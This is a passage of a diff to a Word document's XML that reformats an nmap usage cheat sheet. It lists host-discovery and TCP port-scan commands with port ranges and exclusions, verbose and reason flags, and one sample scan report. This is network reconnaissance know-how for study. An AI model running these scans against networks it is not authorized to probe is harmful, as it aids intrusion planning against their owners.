-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>iL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ips.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> [Input]</w:t>
+        <w:t># nmap -sn 192.168.206.133</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn 192.168.206.133 192.168.206.11</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn 192.168.206.133 10.0.0.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn 192.168.206.1-133</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn 192.168.206.1-133,150</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn 192.168.206.1-133 --exclude 192.168.206.10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn 192.168.206.0/24</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn 192.168.206.0/24 10.0.0.0/8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn domain.tld</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn domain.tld example.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sn -iL ips.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-i [Input]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1319,37 +773,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.1.1</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sT 192.168.1.1</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1380,37 +809,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.74.113 --reason</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sT 192.168.74.113 --reason</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1436,784 +840,370 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:t># nmap -sT 192.168.206.133 -p 80</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sT 192.168.206.133 -p 80,4444</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sT 192.168.206.133 -p 80-100</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sT 192.168.206.133 -p 80,443,100-150,160-170</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap 192.168.206.133 -p U:53,T21-25,80</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sT 192.168.206.133 -p 80-200 --exclude-ports 81</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># nmap -sT 192.168.1.1 -p 0-65535</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>[Entire range 65535 ports]</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>+ Debug:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Press </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>'space bar</w:t>
+      </w:r>
+      <w:r>
+        <w:t>' to debug it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>+ Verbose:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>----------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p 80</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sT 172.30.231.207 -v</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p 80,4444</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sT 172.30.231.207 -vv</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>-s [ Scan ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-T [ TCP Scan ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-p [ port ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-v [ verbose ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-vv [ very verbose ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>eg:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p 80-100</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sT 172.30.231.207</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Starting Nmap 7.70 ( https://nmap.org ) at 2022-02-05 11:46 IST</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Nmap scan report for 172.30.231.207</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Host is up (0.000064s latency).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Not shown: 999 closed ports</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>PORT     STATE SERVICE</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>8080/tcp open  http-proxy</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>``````````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:t>`````````````````````````````````````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p 80,443,100-150,160-170</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sT 172.30.231.207 -p8081 --reason</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>--reason [ reason of port/service state ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>``````````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:t>`````````````````````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># cd /usr/share/nmap/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t># ls</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>nmap-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nmap-protocols</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">  : Contain protocol and port related info</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Disable Host Discovery &amp; Port Scan Only:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>`````````````````````````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:t>```````````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p U:53,T21-25,80</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p 80-200 --exclude-ports 81</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.1.1 -p 0-65535</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>[Entire range 65535 ports]</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>+ Debug:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>--------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> Press </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>'space bar</w:t>
-      </w:r>
-      <w:r>
-        <w:t>' to debug it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>+ Verbose:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>----------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 172.30.231.207 -v</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 172.30.231.207 -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>vv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>-s [ Scan ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-T [ TCP Scan ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-p [ port ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-v [ verbose ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> [ very verbose ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>eg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 172.30.231.207</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Starting Nmap 7.70 ( https://nmap.org ) at 2022-02-05 11:46 IST</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Nmap scan report for 172.30.231.207</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Host is up (0.000064s latency).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Not shown: 999 closed ports</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>PORT     STATE SERVICE</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>8080/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> open  http-proxy</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>``````````````````````````</w:t>
-      </w:r>
-      <w:r>
-        <w:t>`````````````````````````````````````````````````````````````</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 172.30.231.207 -p8081 --reason</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>--reason [ reason of port/service state ]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>``````````````````````````</w:t>
-      </w:r>
-      <w:r>
-        <w:t>`````````````````````````````</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t># cd /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/share/</w:t>
-      </w:r>
